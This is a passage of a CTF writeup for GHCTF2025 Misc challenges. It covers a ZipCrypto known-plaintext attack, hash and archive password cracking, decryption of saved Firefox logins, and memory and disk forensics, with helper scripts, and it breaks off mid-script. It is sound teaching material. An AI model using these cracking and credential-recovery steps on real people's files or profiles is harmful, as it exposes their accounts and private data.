GHCTF2025 Writeup

Misc

mybrave

An encrypted ZIP containing a single PNG image, with no password hint anywhere. The archive uses the legacy ZipCrypto cipher, and the first 16 bytes of every PNG are fixed (the 8-byte signature, the IHDR length 0x0000000D and the chunk type IHDR), which is more than the 12 bytes of known plaintext bkcrack needs, so a known-plaintext attack applies.

Build the known-plaintext file from the constant PNG header:

echo 89504E470D0A1A0A0000000D49484452 | xxd -r -ps > png_header

Run the known-plaintext attack to recover the three internal ZipCrypto keys:

./bkcrack.exe -C mybrave.zip -c mybrave.png -p png_header -o 0

bkcrack 1.7.1 - 2024-12-21
[16:16:21] Z reduction using 9 bytes of known plaintext
100.0 % (9 / 9)
[16:16:21] Attack on 704864 Z values at index 6
Keys: 97d30dcc 173b15a8 6e0e7455
34.5 % (243021 / 704864)
Found a solution. Stopping.
You may resume the attack with the option: --continue-attack 243021
[16:17:05] Keys
97d30dcc 173b15a8 6e0e7455

With the keys, write a copy of the archive under a password of your choice (recovering the original password by brute force is also possible but unnecessary; the keys alone are enough):

./bkcrack.exe -C mybrave.zip -k 97d30dcc 173b15a8 6e0e7455 -U mybrave_solved.zip 666
bkcrack 1.7.1 - 2024-12-21
[16:19:17] Writing unlocked archive mybrave_solved.zip with password "666"
100.0 % (1 / 1)
Wrote unlocked archive.


The image opens normally, but there is suspicious data after the PNG's IEND chunk (decoders stop at IEND, so appended bytes never show up in a viewer). Extract it and Base64-decode it to get the flag.


NSSCTF{I'm_Wh1sp3riNg_OuR_Lu11abY_f0r_Y0u_to_CoMe_B4ck_Home}
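As an added example (my code, not part of the original writeup), a small chunk walker that locates IEND by walking the chunk structure rather than searching for the string, checks every chunk CRC so a corrupted file fails loudly, and Base64-decodes whatever follows. The 1x1 PNG built by build_sample_png is a constructed stand-in for mybrave.png; pass a real file path on the command line to use that instead.

```python
import base64
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def png_trailer(data: bytes) -> bytes:
    """Walk the PNG chunk list and return every byte that follows the IEND chunk.

    A well-formed PNG ends exactly at IEND; decoders ignore anything after it,
    which is why appended data survives viewing the image unnoticed.
    """
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIGNATURE)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        chunk_end = pos + 8 + length + 4            # header + payload + CRC
        if chunk_end > len(data):
            raise ValueError(f"truncated chunk {ctype!r}")
        body = data[pos + 4:pos + 8 + length]        # the CRC covers type + payload
        (crc,) = struct.unpack(">I", data[pos + 8 + length:chunk_end])
        if zlib.crc32(body) & 0xFFFFFFFF != crc:
            raise ValueError(f"bad CRC in chunk {ctype!r}")
        pos = chunk_end
        if ctype == b"IEND":
            return data[pos:]
    raise ValueError("no IEND chunk found")


def decode_trailer(data: bytes) -> bytes:
    """Base64-decode the trailing bytes; embedded whitespace/newlines are tolerated."""
    return base64.b64decode(b"".join(png_trailer(data).split()))


def _chunk(ctype: bytes, payload: bytes) -> bytes:
    body = ctype + payload
    return struct.pack(">I", len(payload)) + body + struct.pack(">I", zlib.crc32(body) & 0xFFFFFFFF)


def build_sample_png(secret: bytes) -> bytes:
    """Constructed 1x1 grayscale PNG with a Base64 payload appended after IEND (test input only)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)   # 8-bit grayscale, no interlace
    idat = zlib.compress(b"\x00\xff")                     # filter byte 0 + one white pixel
    return (PNG_SIGNATURE + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat)
            + _chunk(b"IEND", b"") + base64.b64encode(secret))


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            blob = fh.read()
    else:
        blob = build_sample_png(b"NSSCTF{example}")     # constructed demo input
    print(decode_trailer(blob).decode(errors="replace"))
```

The CRC check is what distinguishes "the file has a trailer" from "the file is damaged": a PNG whose last chunk is cut short raises instead of silently reporting the truncated tail as hidden data.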

mydisk-1

Question 1: what is mrl64's login password?

Under home\l0v3miku\Desktop there is a remember.txt:

MON: w3t4fw3t
TUES: FW4AE32ed
WED: d2D562Wd2
THUR: JHUIY84d9
FRI: ni289UJ8O
SAT: nmi3SDQ2
SUN: 3jn723JK

The password hash is in etc\shadow:

l0v3miku:$y$j9T$Me1sc6HllhxzlxG2YpNXi0$8oums.4ZpbnCsK0a.lmkodOFeCtpC2daRGLz.jAoKI0:20113:0:99999:7:::

Cracking it with john against rockyou.txt yields the password. The hash is yescrypt ($y$), which is deliberately expensive, so this takes a while.

A faster approach picked up from other players: instead of attacking the yescrypt hash, feed rockyou.txt into the challenge's own flag-check routine. That routine derives an AES-GCM key and IV from blake2b(password + answer2 + answer3), so once questions 2 and 3 are answered, a successful GCM tag verification identifies the correct password.

import hashlib
from Crypto.Cipher import AES

dic_path = 'D:/Dic/rockyou.txt'

# Answers to questions 2 and 3 are already known; only the login password is missing
ANSWER = "120_http://192.168.252.1:8000"
FLAG = "th3_TExt_n0w_YOU_kn0w!"

# Ciphertext and GCM tag taken from the challenge's check script
C_ = bytes.fromhex("0565bd65d5920de6ed335761b245a938f6b4d6a3a70b2e0d79991673d8bf6230a79241d397003fcb6f8afcc5")
H = bytes.fromhex("8ed6e078f14d16e52da4e3bbe88e325d")

with open(dic_path, 'r', encoding='latin-1') as file:
    for line in file:
        PASSWORD = line.strip()

        # Key and IV are the first 32 bytes of blake2b(password || answer || flag),
        # exactly as the check script derives them
        D = hashlib.blake2b(PASSWORD.encode() + ANSWER.encode() + FLAG.encode()).digest()
        KEY, IV = D[0:16], D[16:32]
        cipher = AES.new(KEY, AES.MODE_GCM, nonce=IV)

        try:
            # A wrong password fails the GCM tag check and raises ValueError
            plaintext = cipher.decrypt_and_verify(C_, H)
        except ValueError:
            continue

        print(f'Password is {PASSWORD}')
        print(plaintext.decode())
        break

This finds the password far faster: one blake2b plus one AES-GCM verification per guess costs orders of magnitude less than a yescrypt evaluation. The general point is that a strong password hash only helps while the same password is not also checked somewhere cheaper.

Password is theo0114@
NSSCTF{88f96978-ec64-4255-8df7-43e5ec9c9b6e}

Question 2: mrl64 set up a scheduled task; every how many seconds does it send a request, and to which address?

Reading the crontab, one entry stands out; its schedule gives an interval of 120 s (cron resolution is one minute, so the shortest intervals are whole minutes):


The script it runs, a.py, lives at

usr\local\share\xml\entities\a.py

a.py contains the target address:

import requests

def fetch_content(url):
    try:
        response = requests.get(url)
        response.raise_for_status()  # Raise an error for HTTP codes 4xx/5xx
        print(response.text)
    except requests.exceptions.RequestException as e:
        print(f"An error occurred: {e}")

if __name__ == "__main__":
    url = "http://192.168.252.1:8000"
    fetch_content(url)

So the answer is

120_http://192.168.252.1:8000

Question 3: someone sent mrl64 an email; can you get the flag in it?

A quick look shows the mail client is Foxmail (running under Wine); extract the user's mailbox directory from \home\l0v3miku\.wine\drive_c\Foxmail 7.2\Storage

Install Foxmail locally, log in with an account of your own, copy the extracted directory into Storage, and add a line to FMStorage.list under Foxmail 7.2:

Storage\632290674@qq.com\

Restart Foxmail and the mailbox shows the email:


The email carries an encrypted archive. Run a mask attack with each password from remember.txt followed by four unknown characters (? being the single-character wildcard of the cracking tool used):

w3t4fw3t????
FW4AE32ed????
d2D562Wd2????
JHUIY84d9????
ni289UJ8O????
nmi3SDQ2????
3jn723JK????

which yields the archive password

nmi3SDQ22580

Extracting the archive gives the flag

th3_TExt_n0w_YOU_kn0w!

Full answers:

# Question 1: what is mrl64's login password?
PASSWORD = "theo0114@"    # string of login password

# Question 2: mrl64 set up a scheduled task; every how many seconds does it send a request, and to which address?
ANSWER = "120_http://192.168.252.1:8000" # string of answer, like "90_http://127.0.0.1:6666"

# Question 3: someone sent mrl64 an email; can you get the flag in it?
FLAG = "th3_TExt_n0w_YOU_kn0w!" # string of flag

Running the check script yields the flag

NSSCTF{88f96978-ec64-4255-8df7-43e5ec9c9b6e}

mydisk-2

Question 1: what is the name of the operating system on mrl64's computer?

Look at etc/issue:

Linux Mint 22.1 Xia \n \l

so the system name is

Linux Mint 22.1 Xia

Question 2: do you know mrl64's ctfshow account and password?

Export the Firefox profile from \home\l0v3miku\.mozilla\firefox.

Two files are needed: the saved-login store logins.json (older profiles: signons.sqlite) and the key database key4.db (older: key3.db). Copy both into the firepwd.py directory and run:

python3 firepwd.py logins.json

firepwd's output follows. The "password check? True" line after the first PBES2 structure is the empty master password being verified against the global salt: no master password was set, so the stored logins decrypt offline with no cracking at all (with a master password you would have to recover that first):

globalSalt: b'1b0194b7b99b5db3b74c30913de216b5a77ba379'
 SEQUENCE {
   SEQUENCE {
     OBJECTIDENTIFIER 1.2.840.113549.1.5.13 pkcs5 pbes2
     SEQUENCE {
       SEQUENCE {
         OBJECTIDENTIFIER 1.2.840.113549.1.5.12 pkcs5 PBKDF2
         SEQUENCE {
           OCTETSTRING b'094c7be8c7764131d450807e2e090a6cbc576b5943473d34b104e37dc689f8ef'
           INTEGER b'01'
           INTEGER b'20'
           SEQUENCE {
             OBJECTIDENTIFIER 1.2.840.113549.2.9 hmacWithSHA256
           }
         }
       }
       SEQUENCE {
         OBJECTIDENTIFIER 2.16.840.1.101.3.4.1.42 aes256-CBC
         OCTETSTRING b'f9bb21d1042ebdfd5490ccb282a1'
       }
     }
   }
   OCTETSTRING b'fecc109cd50fbfc78cf6fce1f9b7482b'
 }
clearText b'70617373776f72642d636865636b0202'
password check? True
 SEQUENCE {
   SEQUENCE {
     OBJECTIDENTIFIER 1.2.840.113549.1.5.13 pkcs5 pbes2
     SEQUENCE {
       SEQUENCE {
         OBJECTIDENTIFIER 1.2.840.113549.1.5.12 pkcs5 PBKDF2
         SEQUENCE {
           OCTETSTRING b'94d83e7f733c471e25ef6640ef6b2c1605ed884bd899c9a6e6d1eec89cf3bf72'
           INTEGER b'01'
           INTEGER b'20'
           SEQUENCE {
             OBJECTIDENTIFIER 1.2.840.113549.2.9 hmacWithSHA256
           }
         }
       }
       SEQUENCE {
         OBJECTIDENTIFIER 2.16.840.1.101.3.4.1.42 aes256-CBC
         OCTETSTRING b'1df636fd6010eeb3a512967cf24a'
       }
     }
   }
   OCTETSTRING b'd1b88e03b9449ded2abce109153302cc2aafa26f2602f40794888df006b1dc6d'
 }
clearText b'193b9752fb5275868fd0ef9e75ef79f4fb73f80d374346380808080808080808'
decrypting login/password pairs
    https://ctf.show:b'l0v3Miku',b'mrl64_love_miku'

Recovered account and password:

l0v3Miku/mrl64_love_miku

Question 3: there is a Docker container on mrl64's computer, and an important piece of information is stored in its environment; do you know what it is?

Under \var\lib\docker\containers every container has a config.v2.json holding its stored configuration; this one's:

{
    "StreamConfig": {

    },
    "State": {
        "Running": false,
        "Paused": false,
        "Restarting": false,
        "OOMKilled": false,
        "RemovalInProgress": false,
        "Dead": false,
        "Pid": 0,
        "ExitCode": 137,
        "Error": "",
        "StartedAt": "2025-01-25T15:27:49.649779636Z",
        "FinishedAt": "2025-01-25T15:28:32.175453109Z",
        "Health": null
    },
    "ID": "b166c738b107b87970df95affe903fe4e31e62762da68143023080804e87b8af",
    "Created": "2025-01-25T15:27:49.488917182Z",
    "Managed": false,
    "Path": "/bin/bash",
    "Args": [
        "/docker-entrypoint.sh"
    ],
    "Config": {
        "Hostname": "b166c738b107",
        "Domainname": "",
        "User": "",
        "AttachStdin": false,
        "AttachStdout": false,
        "AttachStderr": false,
        "ExposedPorts": {
            "9999/tcp": {

            }
        },
        "Tty": false,
        "OpenStdin": false,
        "StdinOnce": false,
        "Env": [
            "PATH=/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
            "LANG=C.UTF-8",
            "GPG_KEY=7169605F62C751356D054A26A821E680E5FA6305",
            "PYTHON_VERSION=3.12.8",
            "PYTHON_SHA256=c909157bb25ec114e5869124cc2a9c4a4d4c1e957ca4ff553f1edc692101154e",
            "IMPORTANT_INFO=Y0U_FouNd_mE!"
        ],
        "Cmd": null,
        "Image": "edd5aa8131c3",
        "Volumes": null,
        "WorkingDir": "",
        "Entrypoint": [
            "/bin/bash",
            "/docker-entrypoint.sh"
        ],
        "OnBuild": null,
        "Labels": {
            "auther_template": "CTF-Archives"
        }
    },
    "Image": "sha256:edd5aa8131c38faba4b89399cdffcf8b53e559ec915580eb35ca21671c708023",
    "ImageManifest": null,
    "NetworkSettings": {
        "Bridge": "",
        "SandboxID": "",
        "SandboxKey": "",
        "HairpinMode": false,
        "LinkLocalIPv6Address": "",
        "LinkLocalIPv6PrefixLen": 0,
        "Networks": {
            "bridge": {
                "IPAMConfig": null,
                "Links": null,
                "Aliases": null,
                "MacAddress": "",
                "DriverOpts": null,
                "NetworkID": "eb19cb0a860bbd1a360488fcc038278480c36b7b217542ddc91c79e4237d02e9",
                "EndpointID": "",
                "Gateway": "",
                "IPAddress": "",
                "IPPrefixLen": 0,
                "IPv6Gateway": "",
                "GlobalIPv6Address": "",
                "GlobalIPv6PrefixLen": 0,
                "DNSNames": null,
                "IPAMOperational": false,
                "DesiredMacAddress": ""
            }
        },
        "Service": null,
        "Ports": null,
        "SecondaryIPAddresses": null,
        "SecondaryIPv6Addresses": null,
        "HasSwarmEndpoint": false
    },
    "LogPath": "/var/lib/docker/containers/b166c738b107b87970df95affe903fe4e31e62762da68143023080804e87b8af/b166c738b107b87970df95affe903fe4e31e62762da68143023080804e87b8af-json.log",
    "Name": "/wow",
    "Driver": "overlay2",
    "OS": "linux",
    "RestartCount": 0,
    "HasBeenStartedBefore": true,
    "HasBeenManuallyStopped": true,
    "MountPoints": {

    },
    "SecretReferences": null,
    "ConfigReferences": null,
    "MountLabel": "",
    "ProcessLabel": "",
    "AppArmorProfile": "docker-default",
    "SeccompProfile": "",
    "NoNewPrivileges": false,
    "HostnamePath": "/var/lib/docker/containers/b166c738b107b87970df95affe903fe4e31e62762da68143023080804e87b8af/hostname",
    "HostsPath": "/var/lib/docker/containers/b166c738b107b87970df95affe903fe4e31e62762da68143023080804e87b8af/hosts",
    "ShmPath": "",
    "ResolvConfPath": "/var/lib/docker/containers/b166c738b107b87970df95affe903fe4e31e62762da68143023080804e87b8af/resolv.conf",
    "LocalLogCacheMeta": {
        "HaveNotifyEnabled": false
    }
}

The answer is the IMPORTANT_INFO entry under Config.Env. Anything passed to the container with -e/--env is persisted there in clear text (and printed by docker inspect), so environment variables are no place for secrets, and a stopped container still leaks them.

Y0U_FouNd_mE!
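An added example (not from the writeup) of hunting for this offline: it walks every containers/*/config.v2.json below a Docker root (a mounted disk image works as well as a live host), parses Config.Env, drops the variables the official python image sets itself, and keeps names that look like secrets. SAMPLE_CONFIG is a constructed stand-in for the file above with only the fields the scan uses; the DB_PASSWORD entry and the name regex are my additions.

```python
import json
import re
from pathlib import Path

# Variable names that usually carry secrets, matched case-insensitively (my heuristic)
SECRET_NAME_RE = re.compile(r"(pass(word)?|secret|token|key|info|cred)", re.IGNORECASE)

# Variables every official python image sets; noise on their own
IMAGE_BASELINE = {"PATH", "LANG", "GPG_KEY", "PYTHON_VERSION", "PYTHON_SHA256"}


def parse_env(config: dict) -> dict:
    """Return the container's Config.Env list as a name -> value dict."""
    env = {}
    for entry in config.get("Config", {}).get("Env") or []:
        name, _, value = entry.partition("=")
        env[name] = value
    return env


def interesting_env(config: dict) -> dict:
    """Drop the image baseline and keep variables whose name looks secret-bearing."""
    return {k: v for k, v in parse_env(config).items()
            if k not in IMAGE_BASELINE and SECRET_NAME_RE.search(k)}


def scan_containers(docker_root: Path) -> list:
    """Walk <docker_root>/containers/*/config.v2.json and summarise each container."""
    findings = []
    for cfg_path in sorted(docker_root.glob("containers/*/config.v2.json")):
        with cfg_path.open() as fh:
            cfg = json.load(fh)
        findings.append({
            "id": cfg.get("ID", cfg_path.parent.name)[:12],
            "name": cfg.get("Name"),
            "image": cfg.get("Config", {}).get("Image"),
            "running": cfg.get("State", {}).get("Running"),
            "env": interesting_env(cfg),
        })
    return findings


# Constructed sample mirroring the fields seen in the real file above (not the real file)
SAMPLE_CONFIG = {
    "ID": "b166c738b107b87970df95affe903fe4e31e62762da68143023080804e87b8af",
    "Name": "/wow",
    "State": {"Running": False, "ExitCode": 137},
    "Config": {
        "Image": "edd5aa8131c3",
        "Env": [
            "PATH=/usr/local/bin:/usr/local/sbin:/usr/sbin:/usr/bin:/sbin:/bin",
            "LANG=C.UTF-8",
            "GPG_KEY=7169605F62C751356D054A26A821E680E5FA6305",
            "PYTHON_VERSION=3.12.8",
            "IMPORTANT_INFO=Y0U_FouNd_mE!",
            "DB_PASSWORD=hunter2",          # constructed extra entry
        ],
    },
}

if __name__ == "__main__":
    import sys
    import tempfile
    if len(sys.argv) > 1:
        root = Path(sys.argv[1])            # e.g. /var/lib/docker or /mnt/image/var/lib/docker
    else:                                   # demo: write the constructed config into a temp docker root
        root = Path(tempfile.mkdtemp())
        cdir = root / "containers" / SAMPLE_CONFIG["ID"]
        cdir.mkdir(parents=True)
        (cdir / "config.v2.json").write_text(json.dumps(SAMPLE_CONFIG))
    for f in scan_containers(root):
        print(f"{f['id']} {f['name']} image={f['image']} running={f['running']}")
        for k, v in f["env"].items():
            print(f"    {k}={v}")
```

Baseline filtering is what keeps the output readable on a real host with dozens of containers; extend IMAGE_BASELINE per base image rather than loosening the regex.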

Full answers:

# Question 1: what is the name of the operating system on mrl64's computer?
NAME = "Linux Mint 22.1 Xia"    # name of OS, like "Ubuntu 18.04.5 LTS"

# Question 2: do you know mrl64's ctfshow account and password?
ANSWER = "l0v3Miku/mrl64_love_miku" # string of answer, like "mrl64/123456"

# Question 3: there is a Docker container on mrl64's computer with an important piece of information in its environment; what is it?
INFO = "Y0U_FouNd_mE!" # string of important info

Running the check script yields the flag

NSSCTF{085edba8-dd9d-4758-a90c-14c6816b5077}

mycode

Get the algorithm from GPT (arrange the given integers so that their concatenation is the smallest possible number) and wrap it in an interaction script:

from pwn import *
from functools import cmp_to_key


def compare(a, b):
    # a goes before b when a+b < b+a; equal concatenations compare as 0 so the
    # comparator stays consistent (the original returned 1 for ties, which is harmless
    # but not a valid total order)
    return (a + b > b + a) - (a + b < b + a)


def min_concat_number(nums):
    """Order the numbers so that their concatenation is the smallest possible value."""
    nums = sorted(map(str, nums), key=cmp_to_key(compare))
    result = ''.join(nums)
    return result.lstrip('0') or '0'   # "0 0 1" concatenates to "001", i.e. 1


io = remote("node2.anna.nssctf.cn", 28255)

# 100 rounds; each prints "Numbers: a b c ..." and reads the answer after "Smallest:"
for i in range(100):
    io.recvuntil(b'Numbers: ')
    data = io.recvline().strip().decode()

    min_number = min_concat_number(data.split())

    io.sendlineafter(b'Smallest:', min_number.encode())

io.interactive()

mymem-1

Question 1: mrl64 noticed that someone secretly downloaded something onto his computer; can you get pass1 from it?

Browser history gives the name of the downloaded file:

file:///C:/Users/l0v3Miku/Downloads/DgP1YTr/rWFA8Xcd.py

Dump the file out of the memory image and read it:

import os
from zTuS2beK import *
from Crypto.Util.number import *
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad

m = bytes_to_long(hint)
p = getPrime(1024)
q = getPrime(1024)
n = p * q
gift = p + q
e = 0x10001

c = pow(m, e, n)
print(c)
print(n)
print(gift)

key = bytes(os.environ.get('key1'),'utf-8')
iv = key2
cipher = AES.new(key, AES.MODE_CBC, iv)
ciphertext = cipher.encrypt(pad(pass1, AES.block_size))
print(ciphertext.hex())
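The dumped script also prints gift = p + q next to n, which breaks its RSA part outright: p and q are the two roots of x^2 - gift*x + n = 0, so one integer square root recovers them. As an added example (not from the writeup), here is that recovery followed by the decryption, run on constructed small primes instead of the challenge's 1024-bit ones; factor_from_sum and rsa_decrypt_with_gift are generic and apply unchanged to the real c, n and gift.

```python
from math import isqrt


def factor_from_sum(n: int, s: int):
    """Recover p and q from n = p*q and s = p+q.

    p and q are the roots of x^2 - s*x + n = 0, i.e. (s -/+ sqrt(s^2 - 4n)) / 2,
    so the discriminant must be a perfect square of the same parity as s.
    """
    disc = s * s - 4 * n
    if disc < 0:
        raise ValueError("s^2 < 4n: no real roots, gift is not p+q")
    r = isqrt(disc)
    if r * r != disc or (s + r) % 2:
        raise ValueError("discriminant is not a perfect square: gift is not p+q")
    p, q = (s - r) // 2, (s + r) // 2
    if p * q != n:
        raise ValueError("roots do not multiply to n")
    return p, q


def rsa_decrypt_with_gift(c: int, n: int, gift: int, e: int = 0x10001) -> int:
    """Textbook RSA decryption once the factors are known."""
    p, q = factor_from_sum(n, gift)
    phi = (p - 1) * (q - 1)
    d = pow(e, -1, phi)           # modular inverse (Python 3.8+)
    return pow(c, d, n)


def long_to_bytes(m: int) -> bytes:
    return m.to_bytes((m.bit_length() + 7) // 8, "big")


# Constructed demo parameters: two small primes instead of getPrime(1024)
P_DEMO, Q_DEMO = 1000003, 1000033
N_DEMO = P_DEMO * Q_DEMO
GIFT_DEMO = P_DEMO + Q_DEMO
M_DEMO = int.from_bytes(b"hi", "big")
C_DEMO = pow(M_DEMO, 0x10001, N_DEMO)

if __name__ == "__main__":
    print(factor_from_sum(N_DEMO, GIFT_DEMO))
    print(long_to_bytes(rsa_decrypt_with_gift(C_DEMO, N_DEMO, GIFT_DEMO)))
```

The parity and perfect-square checks matter on real input: if the printed gift were something other than p + q (a red herring, or a value truncated while copying from the dump), the function fails immediately instead of producing a wrong d.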

key1 has to be read from the process's environment variables (the volatility envars plugin):


thisiskey1_12345

key2 presumably sits in process memory, so run strings over the process dump:

strings pid.1228.dmp > notepad.txt

which contains the following (the hint line says key2 is the login password repeated twice, consistent with the string P@ssW0RdP@ssW0Rd next to it: 16 bytes, exactly one AES block, as the IV must be):

OK_p4ss1_y0u_G3T_1t_n0ws.
hint{key2_is_my_login_password_repeated_twice}s
P@ssW0RdP@ssW0RdN)
pass1
hint
key2

Hence pass1 is

OK_p4ss1_y0u_G3T_1t_n0w

Question 2: mrl64 likes drawing with Windows' built-in Paint, and this time he couldn't resist drawing pass2 as well, but he went to lunch without closing Paint. Can you see pass2?

List the processes in memory with the pslist plugin and note the PID of mspaint.exe:


Dump that process's memory, rename the dump to .data and open it in GIMP as raw image data; adjusting the width and offset brings the canvas back:


After straightening the image, pass2 is readable:


OHHHH_y0u_c4n_s3e_MY_P@ss2

Question 3: do you know the product ID of mrl64's computer?

The ProductId value under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion in the registry (printkey plugin) gives the answer:


00371-220-0367543-86165

Full answers:

# Question 1: mrl64 noticed that someone secretly downloaded something onto his computer; can you get pass1 from it?
PASS1 = "OK_p4ss1_y0u_G3T_1t_n0w"    # string of pass1

# Question 2: mrl64 likes drawing with Windows' built-in Paint and drew pass2 this time, then went to lunch without closing Paint. Can you see pass2?
PASS2 = "OHHHH_y0u_c4n_s3e_MY_P@ss2" # string of pass2

# Question 3: do you know the product ID of mrl64's computer?
PRODUCT_ID = "00371-220-0367543-86165" # string of product_id, like xxxxx-xxx-xxxxxxx-xxxxx

Running the check script yields the flag

NSSCTF{101e5799-55e8-42c9-b58a-5f1d30039126}

mymem-2

Question 1: there seems to be a strange process running on mrl64's computer; what is its physical offset?

Listing the processes reveals DumpIt.exe:


The listed offset is below. One check worth making: volatility's pslist prints virtual offsets by default (pslist -P or psscan give physical ones), so confirm the value you submit is the kind the question asks for.

0xfa800423a9b0

Question 2: how many times has this strange process been run in total, and for how long has its window had focus in total?

The UserAssist registry data (userassist plugin) records both the run count and the focus time:


Answer:

2_0:00:07.879000

Question 3: what is the PoolTag of this strange process?

mypixel

Running zsteg over all channel and bit-plane combinations shows ZIP data in one of them:

zsteg -a attachment.png


Extract that channel as 1.zip:

zsteg -E "b8,rgb,lsb,xy" attachment.png > 1.zip

Unzipping gives out.png, which contains only black and white pixels, so a script turns it into a bit string:

from PIL import Image

def read_image_pixels(image_path):
    """Scan the image row by row and emit one bit per pixel: 1 for black, 0 for white."""
    image = Image.open(image_path).convert('L')   # grayscale: 0 = black, 255 = white
    width, height = image.size
    pixel_str = ""

    for y in range(height):
        for x in range(width):
            pixel = image.getpixel((x, y))
            pixel_str += "0" if pixel > 127 else "1"  # 0 = white, 1 = black

    return pixel_str

image_path = "out.png"   # the image extracted from 1.zip
pixels = read_image_pixels(image_path)
print(pixels)

Rendering the bit string back into a (scaled-up) PNG gives a Han Xin code:
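The writeup does not show this rendering step. As an added example (my code, not the writeup's), here is a minimal PNG writer using only zlib and struct that draws the bit string as an 8-bit grayscale image and scales every module up so a phone camera can read the code. It assumes the bit string was produced row by row as in the script above, so the width to pass is the original image's width; the 4x4 pattern in the demo is constructed.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def render_rows(bits: str, width: int, scale: int = 1) -> bytes:
    """Filtered scanlines: each row starts with filter byte 0, then one byte per pixel.

    '1' is drawn black (0x00) and '0' white (0xff); scale repeats each module
    scale times horizontally and each row scale times vertically.
    """
    if width <= 0 or len(bits) % width:
        raise ValueError("bit string length is not a multiple of width")
    raw = bytearray()
    for y in range(len(bits) // width):
        row = bits[y * width:(y + 1) * width]
        scaled = b"".join((b"\x00" if b == "1" else b"\xff") * scale for b in row)
        for _ in range(scale):
            raw.append(0)            # filter type 0 (None)
            raw.extend(scaled)
    return bytes(raw)


def _chunk(ctype: bytes, payload: bytes) -> bytes:
    body = ctype + payload
    return struct.pack(">I", len(payload)) + body + struct.pack(">I", zlib.crc32(body) & 0xFFFFFFFF)


def bits_to_png(bits: str, width: int, scale: int = 1) -> bytes:
    """Wrap the scanlines into a valid 8-bit grayscale, non-interlaced PNG."""
    height = len(bits) // width
    ihdr = struct.pack(">IIBBBBB", width * scale, height * scale, 8, 0, 0, 0, 0)
    return (PNG_SIGNATURE + _chunk(b"IHDR", ihdr)
            + _chunk(b"IDAT", zlib.compress(render_rows(bits, width, scale)))
            + _chunk(b"IEND", b""))


def png_size(png: bytes) -> tuple:
    """(width, height) read back from IHDR, as a sanity check before scanning."""
    return struct.unpack(">II", png[16:24])


if __name__ == "__main__":
    import sys
    # usage: python3 this.py <file-with-bitstring> <width> [scale]; with no arguments a constructed demo is drawn
    if len(sys.argv) >= 3:
        with open(sys.argv[1]) as fh:
            bits = fh.read().strip()
        width = int(sys.argv[2])
        scale = int(sys.argv[3]) if len(sys.argv) > 3 else 10
    else:
        bits, width, scale = "1001" "0110" "0110" "1001", 4, 10   # constructed pattern
    png = bits_to_png(bits, width, scale)
    with open("code.png", "wb") as fh:
        fh.write(png)
    print("wrote code.png", png_size(png))
```

A scale of 8 to 10 is usually enough for a scanner; if the code does not read, the first thing to verify is the width, since a wrong width shears the whole pattern rather than failing visibly.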


Scanning it gives the flag


NSSCTF{f92a7a2e-9606-4319-9d97-942de4f0315a}

mywav

The hint says it is about Hz and that there are only two of them; two frequencies suggest a binary encoding (or something Morse-like).

Start with a small WAV parser and plot the waveform: the oscillation is visibly denser in some stretches than in others, i.e. the frequency changes, but it is not yet known how many samples each frequency segment lasts. Extend the plotting code to detect the first change point:

import wave
import numpy as np
import matplotlib.pyplot as plt

# Open the WAV file
file_path = 'attachment.wav'  # replace with the path of your WAV file
with wave.open(file_path, 'rb') as wav_file:
    # Read the WAV parameters
    sample_rate = wav_file.getframerate()
    num_frames = wav_file.getnframes()

    # Read the samples (16-bit PCM, mono assumed; stereo would interleave channels)
    wave_data = np.frombuffer(wav_file.readframes(num_frames), dtype=np.int16)

# Plot only the first 1000 samples
plot_data_points = 1000
plt.plot(wave_data[:plot_data_points])

# First difference of the samples: an abrupt jump in slope marks a frequency change
diff_data = np.diff(wave_data[:plot_data_points])

# Positions where the waveform changes abruptly
threshold = 500  # adjust to the actual amplitude
change_points = np.where(np.abs(diff_data) > threshold)[0]

# Mark the first change
if change_points.size > 0:
    first_change_point = change_points[0]
    plt.axvline(x=first_change_point, color='red', linestyle='--', label=f"{first_change_point}")
    print(f"First frequency change at sample {first_change_point}")
else:
    print("No obvious frequency change detected.")

# Show the plot
plt.xlabel('Sample')
plt.ylabel('Amplitude')
plt.legend()
plt.show()

The first change is at sample 441, so the symbol period is 441 samples (at a 44.1 kHz sample rate that is exactly 10 ms per symbol, i.e. 100 baud; check sample_rate from the header to confirm).


With the period known, divide the waveform into windows of that length:

import wave
import numpy as np
import matplotlib.pyplot as plt

# Open the WAV file
file_path = 'attachment.wav'  # replace with the path of your WAV file
with wave.open(file_path, 'rb') as wav_file:
    # Read the WAV parameters
    sample_rate = wav_file.getframerate()
    num_frames = wav_file.getnframes()

    # Read the samples (16-bit PCM, mono assumed)
    wave_data = np.frombuffer(wav_file.readframes(num_frames), dtype=np.int16)

# Plot only the first 5000 samples
plot_data_points = 5000
plt.plot(wave_data[:plot_data_points])

# Draw a red line every 441 samples (the symbol period found above)
interval = 441
for i in range(0, plot_data_points, interval):
    plt.axvline(x=i, color='red', linestyle='--')

# Show the plot
plt.xlabel('Sample')
plt.ylabel('Amplitude')
plt.show()

The resulting plot makes the two kinds of window easy to tell apart:


Next, classify the dominant frequency of each 441-sample window as 0 or 1 to obtain the bit string:

import wave
import numpy as np

# Open the WAV file
file_path = 'attachment.wav'  # replace with the path of your WAV file
with wave.open(file_path, 'rb') as wav_file:
    # Read the WAV parameters
    sample_rate = wav_file.getframerate()
    num_frames = wav_file.getnframes()

    # Read the samples (16-bit PCM, mono assumed)
    wave_data = np.frombuffer(wav_file.readframes(num_frames), dtype=np.int16)

# One symbol every 441 samples
interval = 441
plot_data_points = len(wave_data)

# Nominal tone frequencies. Classification is by the nearer of the two, so any pair
# of tones on opposite sides of the 500 Hz midpoint is separated the same way.
freq_a = 300  # tone A (represents 0)
freq_b = 700  # tone B (represents 1)

# FFT each window and pick its dominant frequency
binary_frequencies = []
for i in range(0, plot_data_points, interval):
    # Samples of the current window (the last one may be shorter)
